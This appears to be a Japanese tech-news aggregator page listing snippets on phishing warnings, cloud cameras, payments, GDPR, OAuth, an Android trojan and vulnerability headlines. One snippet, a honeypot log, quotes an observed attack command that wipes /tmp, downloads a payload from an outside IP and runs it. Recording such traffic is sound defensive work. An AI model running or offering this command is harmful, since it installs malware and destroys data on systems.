Windows 10のWi-Fi接続問題トップ10とその解決策 | ライフハッカー・ジャパンサンディスクのmicroSDカード 512GBが40%OFF。写真や動画のデータ置き場はこれで良くない?【Amazonセール】
金融庁からメールが届いたら1日でクレカ凍結!?
クレジットカード情報を盗む偽サイト フィッシング対策協議会は10月、金融庁を騙るフィッシングの報告を受けたとして注意を呼び掛けている。 これは“金融庁からのメールを受け取った日本人は、審査と認証に協力するためクレジットカードの本人確認が必要。メールを受け取ってから1日以内に認証しないとクレジットカードが使えなくなる”という内容のフィッシングメールで、誘導先ではクレジットカード情報の入力を促される。 フィッシング対策協議会では、フィッシングへの対策として下記を推奨している。なお、金融庁では本人確認を直接実施することはない。 1. 2022/10/04 12:00 時点では、フィッシングサイトは稼働中であり、JPCERT/CC にサイト閉鎖のための調査を依頼中です。類似のフィッシングサイトが公開される可能性がありますので、引き続きご注意ください。 2. このようなフィッシングサイトにて、認証コ
KDDI、AI解析と連携する監視カメラの映像統合管理サービスを提供
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます KDDIは10月24日、監視カメラの映像データを高セキュリティなクラウド上で管理・可視化する映像統合管理サービス「KDDI Video Management Service」を発表した。11月28日に提供を開始する。人工知能(AI)を用いた映像解析と組み合わせることで、指定エリア内の滞留・侵入検知による「防犯・防災対策」、製造品や設備の外観検査による「検品業務や設備点検の効率化・自動化」なども可能になる。 現在、多くの企業は各拠点の防犯や内部統制上の監査証跡などを目的とし、監視カメラを設置している。また、各拠点の映像データを本社・データセンターなどに設置した録画サーバーに集約する場合、映像伝送にかかるネットワークの構築・運用コストが大き
2022年10月 セキュリティアップデート解説:Adobe社29件、Microsoft社96件の脆弱性に対応|トレンドマイクロ
オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら
PayPay、指定日に自動で送金する新機能--生活費などを予約して送り忘れ防止
PayPayは10月21日、ユーザー間送金機能「送る・受け取る」機能に、指定日に自動で残高を送る「スケジュール」機能を実装したと発表した。アプリバージョン「v3.60.0」以降で利用できる。 頻度(毎週または毎月)、開始日と終了日、金額を選択することで、指定日に残高を送金できる。お小遣いや生活費のやり取りなどのシーンで活用でき、送り忘れを防げるとしている。
サイバートラスト、OpenSSFのOSSセキュリティ重点施策に沿った活動を開始 | IT Leaders
IT Leaders トップ > テクノロジー一覧 > OSS > 市場動向 > サイバートラスト、OpenSSFのOSSセキュリティ重点施策に沿った活動を開始 OSS OSS記事一覧へ [市場動向] サイバートラスト、OpenSSFのOSSセキュリティ重点施策に沿った活動を開始 「セキュリティ教育と認定」や「SBOMの普及」など7項目をカバー 2022年10月24日(月)日川 佳三(IT Leaders編集部) リスト サイバートラストは2022年10月24日、オープンソースソフトウェア(OSS)のセキュリティを高める活動の一環として、OpenSSFが推進する10項目の重点施策のうち7項目について具体的な活動を開始したと発表した。「セキュリティ教育と認定」や「SBOM(ソフトウェア部品表)の普及」などである。 サイバートラストは、オープンソースソフトウェア(OSS)のセキュリティを高める
故障検知アルゴリズムをその場で学習できるエンドポイント型AIチップを開発
ロームは2022年9月27日、クラウドサーバがなくても同一AI(人工知能)チップ上で学習する「オンデバイス学習AIチップ」を開発したと発表した。電子機器に搭載したモーターやセンサーの故障を、現地で低消費電力かつリアルタイムで予知できる。2023年度から同チップのAIアクセラレーターを搭載したICの製品化に着手し、2024年度に量産化を予定している。 同AIチップは、慶應義塾大学 教授の松谷宏紀氏が開発した、3層ニューラルネットワークによる「オンデバイス学習アルゴリズム」をベースとしたロームのAIアクセラレーター「AxlCORE-ODL」と、高効率8ビットCPU「tinyMicon MatisseCORE」などで構成する。これにより、数10mWの消費電力でチップ上の学習と推論が可能になった。 機器を設置した場所で、加速度や電流など入力データの「異常度」を数値化してリアルタイムで出力するため、
EUの一般データ保護規則「GDPR」によりなにが変わるのか
GDPRという企業規制は、世界中がEU市民の個人情報を収集・利用する方法に関して、意識を変えるきっかけとなった。 この記事は、ESET社が運営するセキュリティやセキュリティに関する情報サイト「Welivesecurity」の記事を翻訳したものである。 2018年5月25日のことだったが、28あったEU加盟国(当時)にあった多くの企業(EU外のいくつかの企業も)にとっては、混乱の1日となった。 その日までに、各企業は顧客や取引先に対して数え切れないほどのメールを送り、メールマガジンの受信について許可を求めてきたが、それはこれまで必要とされなかったものだった。担当者を置いていない多くの企業では、実際に、どのような顧客データを保有しているのか、そしてそれをどのように整理して保護しなければならないのかを把握・検討しようとしていた。 何が変わったのか GDPR(一般データ保護規則)が適用されたその日
GDPRがデータ保護の転機となった5つの理由 | サイバーセキュリティ情報局
GDPRという画期的な規制は、世界中の企業がEU市民の個人情報を収集・使用する方法に関して、意識を変えるきっかけとなった。 2018年5月25日のことだったが、28あったEU加盟国(当時)にある多くの企業(EU外のいくつかの企業も)にとっては、混乱の1日となった。 その日までに、各企業は顧客や取引先に対して数え切れないのほどのメールを送り、メールマガジンの受信について許可を求めてきたが、それはこれまで必要とされなかったものだ。同時に、専任の担当者を置いていない多くの企業では、実際に、どのような顧客データを保有しているのか、そしてそれをどのように整理して保護しなければならないのかを把握・検討しようとしていた。 何が変わったのか GDPR(一般データ保護規則)が適用されたその日、EU市民の情報を収集・処理・保存するEU内外の企業によって扱われる個人情報に関する意識が大きく変わった。 4年が経過
OAuth の仕組みを理解しながらクライアントを実装してみる | フューチャー技術ブログ
はじめにこんにちは、TIG の吉岡と申します。Tech Blog には初投稿です。認証認可連載の 5 本目です。 業務で認証・認可に関する SaaS に触れる場面があり、そういえば OAuth, OpenID Connect の仕組みをちゃんと理解していなかったと思い、RFC を読みながら OAuth クライアントを実装してみました。N 番煎じの車輪の再発明ですが、何かの役に立てば幸いです。 ※本稿において、OAuth は基本的に OAuth 2.0 を指しますが、OAuth 2.1 にて推奨されているベストプラクティスを取り入れています。 ※本当は OpenID Connect にも触れたかったのですが力尽きました。また機会があれば書かせてください。 Prerequisitesこの記事は、次のような方々に向けて書いています。 OAuth を聞いたことがある 認証と認可の違いを認識している
Rapid Scanによる高速で正確な AppSec テストにより、開発者の信頼を築く | Synopsys Blog
Rapid Scanによる高速で正確な AppSec テストにより、開発者の信頼を築く Synopsys Editorial Team Oct 11, 2022 / 1 min read 「迅速」という言葉は、開発者がアプリケーション・セキュリティ・ソリューションに期待するものについて、特に重要です。開発作業を遅らせるものは摩擦を引き起こします。軽快ですぐに結果が得られることは、従来の脆弱性だけでなく、ハッカーが簡単に悪用できる脆弱性を露呈する可能性のある構成ミスに対しても、有意義で正確な修復を可能にする AST ソリューションの採用の鍵となります。 静的アプリケーション・セキュリティ・テスト(SAST)およびソフトウェア・コンポジション解析(SCA)におえるスキャンは、組織の AST プログラムの一環として必要です。これにより、開発者は結果を速やかに得られ、修復を加速できます。一部の調査
IntelliJ向けの IDEベースの開発者向けアプリケーションセキュリティ | Synopsys Blog
IntelliJ向けの IDEベースの開発者向けアプリケーションセキュリティ Synopsys Editorial Team Oct 11, 2022 / 1 min read アプリケーション開発が進化し、ソフトウェアの作成は、ローカル、ホストといった環境に、クラウド、SaaS (Software as a Service) が加えられてから二十年余りが経ちました。この進化は、開発ワークフローの最初の変化であり、本番環境のソフトウェア資産に対する新しい潜在的な攻撃ベクトルを確立させました。次にオープンソースが急増し、ソフトウェア開発とイノベーションが加速し、コミュニティが人気のある脆弱なオープンソース コンポーネントを採用するのと同じくらい迅速にセキュリティ・リスクが拡大する可能性があるという認識が生まれました。 そして今、私たちはソフトウェア開発ライフサイクルの進化の新しい段階にいるこ
CD・DVD・BDが劣化する要因や種類ごとの寿命についてカナダ保存研究所が解説
大事なデータや思い出として残しておきたい映像・音声は、クラウドサービスやHDDに保存する方法の他、CDやDVD、Blu-rayディスク(BD)といった光ディスクの記録媒体に保存しておくケースも多くあります。このような光ディスクはコンパクトで管理や配布もしやすい一方で、かつて主に記録媒体として使用されたVHSは情報が15年~20年で劣化して消えてしまう「磁気メディア危機」を迎えたように、光ディスクもデータの劣化・損失が起こる可能性があります。そのような劣化や損失が起こる要因などについて、カナダ保存研究所(CCI)が解説しています。 Longevity of Recordable CDs, DVDs and Blu-rays — Canadian Conservation Institute (CCI) Notes 19/1 - Canada.ca https://www.canada.ca/
Harly : Google Playのアプリに潜むトロイの木馬
購読サービス登録型トロイの木馬「Harly」は、どのようにAndroidユーザーを狙っているのでしょうか。 これまで公式Google Playのアプリから、あらゆる種類のマルウェアが見つかっています。多くのアプリは、厳正な審査を受けていますが、残念ながらモデレーターが発見する前にGoogle Playに公開されてしまうケースがあります。こういった類のマルウェアのなかでも最も頻繁に確認されているのが、購読サービス登録型トロイの木馬です。これに感染するとユーザーは、知らない間に有料サービスに登録されてしまいます。 同じ種類のトロイの木馬のなかには、「Jocker」「MobOk」といったものがあり、過去の 記事 (英語記事)でも触れてきました。なかでもHarlyのメカニズムは、Jockerに似ているため、DCコミックスのJockerの パートナー の名前をアレンジして、Harlyと呼ばれています
2022/10/18 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2022/10/18分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 81.161.229.46/jaws; sh /tmp/jaws Location:US Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
新型iPad Proの新機能が「生産性ハック」すぎた! これは大事件です | ライフハッカー・ジャパン
[みんなのケータイ]イスラエルでスマホとキャッシュレスはどこまで進んでる?![[みんなのケータイ]イスラエルでスマホとキャッシュレスはどこまで進んでる?](https://cdn-ak-scissors.b.st-hatena.com/image/square/93e4b5b4ee8d1923b67645f8ada188dd5be06212/height=288;version=1;width=512/https%3A%2F%2Fk-tai.watch.impress.co.jp%2Fimg%2Fktw%2Flist%2F1447%2F025%2Fph01.jpg)
「Microsoft Edge」のPWAアプリ対応が強化 ~タイトルバーのカスタムに対応、通知も強化/
Microsoft公式、GitHubリポジトリをWeb版「Visual Studio Code」で開くブラウザー拡張が登場/Microsoft Edge/Google Chrome対応。オムニバーでリポジトリを検索する機能も
「LibreOffice」に外部からマクロを呼び出せてしまう脆弱性 ~v7.3.6/7.4.1への更新を/
Cookie PrefixのバイパスについてMBSD解説 | ScanNetSecurity
Node.jsのvm2のサンドボックスからの脱出の脆弱性(Sandbreak: CVE-2022-36067) - SIOS SECURITY BLOG
Fortinet製品にCVSS v3スコア9.6の脆弱性 直ちにパッチの適用を